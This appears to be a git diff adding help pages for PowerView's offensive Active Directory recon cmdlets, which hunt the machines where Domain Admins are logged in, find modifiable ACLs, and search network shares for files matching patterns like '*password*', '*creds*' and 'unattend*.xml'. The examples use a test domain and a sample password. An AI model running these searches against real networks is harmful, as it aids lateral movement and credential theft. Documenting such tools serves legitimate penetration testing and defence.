+Specifies the LDAP source to search through for target users.

+e.g.

+"LDAP://OU=secret,DC=testlab,DC=local".

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserGroupIdentity

+Specifies a group identity to query for target users, defaults to 'Domain Admins.

+If any other user specifications are set, then UserGroupIdentity is ignored.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: GroupName, Group

+

+Required: False

+Position: Named

+Default value: Domain Admins

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserAdminCount

+Switch.

+Search for users users with '(adminCount=1)' (meaning are/were privileged).

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: AdminCount

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -CheckAccess

+{{Fill CheckAccess Description}}

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target computer(s).

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -StopOnSuccess

+Switch.

+Stop hunting after finding after finding a target user.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Delay

+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Jitter

+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3

+

+```yaml

+Type: Double

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0.3

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Threads

+The number of threads to use for user searching, defaults to 20.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 20

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.LogonEvent

+

+PowerView.ExplicitCredentialLogon

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)

+

diff --git a/docs/Recon/Find-DomainUserLocation.md b/docs/Recon/Find-DomainUserLocation.md
new file mode 100755
index 0000000..0d200aa
--- /dev/null
+++ b/docs/Recon/Find-DomainUserLocation.md
@@ -0,0 +1,579 @@
+# Find-DomainUserLocation

+

+## SYNOPSIS

+Finds domain machines where specific users are logged into.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction

+

+## SYNTAX

+

+### UserGroupIdentity (Default)

+```

+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]

+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]

+ [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserGroupIdentity <String[]>]

+ [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]

+```

+

+### UserIdentity

+```

+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]

+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]

+ [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]

+ [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+ [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]

+```

+

+### ShowAll

+```

+Find-DomainUserLocation [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]

+ [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]

+ [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>] [-UserAdminCount]

+ [-UserAllowDelegation] [-CheckAccess] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]

+ [-Jitter <Double>] [-ShowAll] [-Stealth] [-StealthSource <String>] [-Threads <Int32>]

+```

+

+## DESCRIPTION

+This function enumerates all machines on the current (or specified) domain

+using Get-DomainComputer, and queries the domain for users of a specified group

+(default 'Domain Admins') with Get-DomainGroupMember.

+Then for each server the

+function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon

+The found user list is compared against the target list, and any matches are

+displayed.

+If -ShowAll is specified, all results are displayed instead of

+the filtered set.

+If -Stealth is specified, then likely highly-trafficed servers

+are enumerated with Get-DomainFileServer/Get-DomainController, and session

+enumeration is executed only against those servers.

+If -Credential is passed,

+then Invoke-UserImpersonation is used to impersonate the specified user

+before enumeration, reverting after with Invoke-RevertToSelf.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-DomainUserLocation

+```

+

+Searches for 'Domain Admins' by enumerating every computer in the domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Find-DomainUserLocation -Stealth -ShowAll

+```

+

+Enumerates likely highly-trafficked servers, performs just session enumeration

+against each, and outputs all results.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local

+```

+

+Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged

+users in dev.testlab.local.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Find-DomainUserLocation -Domain testlab.local -Credential $Cred

+

+Searches for domain admin locations in the testlab.local using the specified alternate credentials.

+

+## PARAMETERS

+

+### -ComputerName

+Specifies an array of one or more hosts to enumerate, passable on the pipeline.

+If -ComputerName is not passed, the default behavior is to enumerate all machines

+in the domain returned by Get-DomainComputer.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DNSHostName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to query for computers AND users, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerDomain

+Specifies the domain to query for computers, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerLDAPFilter

+Specifies an LDAP query string that is used to search for computer objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSearchBase

+Specifies the LDAP source to search through for computers,

+e.g.

+"LDAP://OU=secret,DC=testlab,DC=local".

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerUnconstrained

+Switch.

+Search computer objects that have unconstrained delegation.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: Unconstrained

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerOperatingSystem

+Search computers with a specific operating system, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: OperatingSystem

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerServicePack

+Search computers with a specific service pack, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServicePack

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSiteName

+Search computers in the specific AD Site name, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: SiteName

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserIdentity

+Specifies one or more user identities to search for.

+

+```yaml

+Type: String[]

+Parameter Sets: UserIdentity

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserDomain

+Specifies the domain to query for users to search for, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserLDAPFilter

+Specifies an LDAP query string that is used to search for target users.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserSearchBase

+Specifies the LDAP source to search through for target users.

+e.g.

+"LDAP://OU=secret,DC=testlab,DC=local".

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserGroupIdentity

+Specifies a group identity to query for target users, defaults to 'Domain Admins.

+If any other user specifications are set, then UserGroupIdentity is ignored.

+

+```yaml

+Type: String[]

+Parameter Sets: UserGroupIdentity

+Aliases: GroupName, Group

+

+Required: False

+Position: Named

+Default value: Domain Admins

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserAdminCount

+Switch.

+Search for users users with '(adminCount=1)' (meaning are/were privileged).

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: AdminCount

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserAllowDelegation

+Switch.

+Search for user accounts that are not marked as 'sensitive and not allowed for delegation'.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: AllowDelegation

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -CheckAccess

+Switch.

+Check if the current user has local admin access to computers where target users are found.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain and target systems.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -StopOnSuccess

+Switch.

+Stop hunting after finding after finding a target user.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Delay

+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Jitter

+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3

+

+```yaml

+Type: Double

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0.3

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ShowAll

+Switch.

+Return all user location results instead of filtering based on target

+specifications.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: ShowAll

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Stealth

+Switch.

+Only enumerate sessions from connonly used target servers.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -StealthSource

+The source of target servers to use, 'DFS' (distributed file servers),

+'DC' (domain controllers), 'File' (file servers), or 'All' (the default).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: All

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Threads

+The number of threads to use for user searching, defaults to 20.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 20

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.UserLocation

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Find-InterestingDomainAcl.md b/docs/Recon/Find-InterestingDomainAcl.md
new file mode 100755
index 0000000..eeda73a
--- /dev/null
+++ b/docs/Recon/Find-InterestingDomainAcl.md
@@ -0,0 +1,239 @@
+# Find-InterestingDomainAcl

+

+## SYNOPSIS

+Finds object ACLs in the current (or specified) domain with modification

+rights set to non-built in objects.

+

+Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName

+

+## SYNTAX

+

+```

+Find-InterestingDomainAcl [[-Domain] <String>] [-ResolveGUIDs] [-RightsFilter <String>] [-LDAPFilter <String>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,

+and for each returned ACE entry it checks if principal security identifier

+is *-1000 (meaning the account is not built in), and also checks if the rights for

+the ACE mean the object can be modified by the principal.

+If these conditions are met,

+then the security identifier SID is translated, the domain object is retrieved, and

+additional IdentityReference* information is appended to the output object.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-InterestingDomainAcl

+```

+

+Finds interesting object ACLS in the current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs

+```

+

+Finds interesting object ACLS in the ev.testlab.local domain and

+resolves rights GUIDs to display names.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs

+

+## PARAMETERS

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainName, Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -ResolveGUIDs

+Switch.

+Resolve GUIDs to their display names.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RightsFilter

+{{Fill RightsFilter Description}}

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.ACL

+

+Custom PSObject with ACL entries.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Find-InterestingDomainShareFile.md b/docs/Recon/Find-InterestingDomainShareFile.md
new file mode 100755
index 0000000..511510f
--- /dev/null
+++ b/docs/Recon/Find-InterestingDomainShareFile.md
@@ -0,0 +1,463 @@
+# Find-InterestingDomainShareFile

+

+## SYNOPSIS

+Searches for files matching specific criteria on readable shares

+in the domain.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction

+

+## SYNTAX

+

+### FileSpecification (Default)

+```

+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]

+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-Include <String[]>] [-SharePath <String[]>]

+ [-ExcludedShares <String[]>] [-LastAccessTime <DateTime>] [-LastWriteTime <DateTime>]

+ [-CreationTime <DateTime>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]

+ [-Threads <Int32>]

+```

+

+### OfficeDocs

+```

+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]

+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]

+ [-ExcludedShares <String[]>] [-OfficeDocs] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]

+```

+

+### FreshEXEs

+```

+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]

+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]

+ [-ExcludedShares <String[]>] [-FreshEXEs] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]

+ [-Threads <Int32>]

+```

+

+## DESCRIPTION

+This function enumerates all machines on the current (or specified) domain

+using Get-DomainComputer, and enumerates the available shares for each

+machine with Get-NetShare.

+It will then use Find-InterestingFile on each

+readhable share, searching for files marching specific criteria.

+If -Credential

+is passed, then Invoke-UserImpersonation is used to impersonate the specified

+user before enumeration, reverting after with Invoke-RevertToSelf.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-InterestingDomainShareFile

+```

+

+Finds 'interesting' files on the current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local')

+```

+

+Finds 'interesting' files on readable shares on the specified systems.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword)

+Find-DomainShare -Domain testlab.local -Credential $Cred

+

+Searches interesting files in the testlab.local domain using the specified alternate credentials.

+

+## PARAMETERS

+

+### -ComputerName

+Specifies an array of one or more hosts to enumerate, passable on the pipeline.

+If -ComputerName is not passed, the default behavior is to enumerate all machines

+in the domain returned by Get-DomainComputer.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DNSHostName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -ComputerDomain

+Specifies the domain to query for computers, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerLDAPFilter

+Specifies an LDAP query string that is used to search for computer objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSearchBase

+Specifies the LDAP source to search through for computers,

+e.g.

+"LDAP://OU=secret,DC=testlab,DC=local".

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerOperatingSystem

+Search computers with a specific operating system, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: OperatingSystem

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerServicePack

+Search computers with a specific service pack, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServicePack

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSiteName

+Search computers in the specific AD Site name, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: SiteName

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Include

+Only return files/folders that match the specified array of strings,

+i.e.

+@(*.doc*, *.xls*, *.ppt*)

+

+```yaml

+Type: String[]

+Parameter Sets: FileSpecification

+Aliases: SearchTerms, Terms

+

+Required: False

+Position: Named

+Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SharePath

+Specifies one or more specific share paths to search, in the form \\\\COMPUTER\Share

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: Share

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ExcludedShares

+Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: @('C$', 'Admin$', 'Print$', 'IPC$')

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LastAccessTime

+Only return files with a LastAccessTime greater than this date value.

+

+```yaml

+Type: DateTime

+Parameter Sets: FileSpecification

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LastWriteTime

+Only return files with a LastWriteTime greater than this date value.

+

+```yaml

+Type: DateTime

+Parameter Sets: FileSpecification

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -CreationTime

+Only return files with a CreationTime greater than this date value.

+

+```yaml

+Type: DateTime

+Parameter Sets: FileSpecification

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -OfficeDocs

+Switch.

+Search for office documents (*.doc*, *.xls*, *.ppt*)

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: OfficeDocs

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FreshEXEs

+Switch.

+Find .EXEs accessed within the last 7 days.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: FreshEXEs

+Aliases: 

+

